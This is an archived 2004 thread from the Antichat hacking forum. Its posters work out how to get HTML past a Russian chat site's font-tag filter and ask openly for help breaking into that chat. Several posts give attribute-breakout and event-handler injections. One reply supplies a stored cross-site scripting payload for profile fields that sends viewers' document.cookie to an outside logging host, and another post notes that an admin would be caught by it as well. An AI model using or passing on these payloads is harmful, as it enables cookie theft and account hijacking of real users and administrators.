Фишка в чате [Архив] - Форум АНТИЧАТ

Просмотр полной версии : Фишка в чате

Thief

06.08.2004, 21:13

Фишка №1. В чате разрешен тэг font, точнее только font color, но это только кажется . Итак, пишем прямо в тексте сообщения <font color='00ff00" size=6 face=Impact "'>Hi all!</font>. Что получится из этого, думаю, ясно.

А теперь продолжим эту идею: <font color='00ff00" style="font-size:200px;font-family:Impact;background:url(http://бесплатный сервак.ру/картинка.гиф)" "'>Hi all!</font>

Поидее должны получить текст в 200 пикселей с фоновой картинкой.
Проверьте всё ли я правильно написал, скажите ошибки в тегах пожалуйста. Спасибо. Кстати чат asp.

zFailure

07.08.2004, 09:14

линк на чат дай, посмотрим, скажем....

Fr1k

07.08.2004, 11:22

Та прививильно правилльно.

Но я предепочёл бы по лучше способ
<font align=center STYLE='filter:Glow(Color=#FBA2AF);width:200;FONT-SIZE:62px;color:#000000;FONT-FAMILY:arial;background:url(http://image)'>ФРИК</font>

Fr1k

07.08.2004, 11:23

да! и посмотреть чат желательно б!

Fr1k

07.08.2004, 12:22

Ну а если толоко вать уже с тэгом фонт, то он как и любой тэг может использовать событие тоесть <font onclick=alert("Текст...пробел нужно использовать через юни &nbsp;")>ну и т.д. так же как и onmoseower и т.д.

Thief

09.08.2004, 20:53

Название чата http://www.ostrovok.net/ вам распечат в html вот смотрите <html>
<head>
<title>Островок.net - Первый чат на Сахалине.</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<style type="text/css">
 
</style>
<script language="JavaScript" src="functions.js"></script>
<script language="JavaScript">

</SCRIPT>
</head>
<frameset rows="*,110" frameborder="No" framespacing=0 bordercolor="#000000" border=0 onLoad="javascript:RefreshFrames('auto'http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif;"">
 <frameset cols="*,200">
   <frame name="mess" scrolling="yes" src="mess.php" frameborder=0 marginheight=0 marginwidth=0>
   <frame name="users" src="users.php" frameborder=0 marginheight=0 marginwidth=0>
 </frameset>
 <frame name="input" scrolling="NO" noresize  frameborder=0 marginheight=0 marginwidth=0
src="input.php?&str=">
</frameset>
<noframes><body bgcolor="#FFFFFF"><br>
Your browser not support frames.
</body></noframes>
</html>

я вставил в текст <font align=center STYLE='filter:Glow(Color=#FBA2AF);width:200;FONT-SIZE:62px;color:#000000;FONT-FAMILY:arial;background:url(http://image)'>ФРИК</font>

В тексте появилось только слово Фрик и что это значит вообщем помогите поломать чат.

10.08.2004, 01:38

Короче, так просто всё не выйдет, вы и так уже всё сами поняли.
И с чего вы взяли, что он фонт колор пропускает?

Thief

10.08.2004, 05:11

Незнаю может пропускает а что пропускает подскажите пожалуйстка. Как его поломать.

zFailure

10.08.2004, 11:47

если в своей инфе указать
URL http://z.ru`" z=`
А о себе ` style="background:url(javascript:x=new Image()\;x.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie)" z

то любой кто просмотрит вашу инфу в чате
становятся вашими невольными жертвами

http://antichat.ru/sniff/log.php

Thief

10.08.2004, 21:51

А поломать такой чат возможно?

Че Гевара

10.08.2004, 22:00

Это и есть взлом ..

ля-ля

23.08.2004, 22:36

Че Гевара  а  точнее?

m0nzt3r

27.08.2004, 15:11

2Lya-Lya

Che xochet skazat chto vnedreniye takogo scripta eto uje samo-saboy tak skazat vzlom chata  http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif  ved yesli admin toje posmotrit infu to togda  http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif   http://forum.antichat.ru/iB_html/non-cgi/emoticons/devil.gif

Pravilno Che Gevara? http://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif

Че Гевара

27.08.2004, 15:26

Absolutno verno ...  http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif

m0nzt3r

27.08.2004, 22:35

lolz http://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif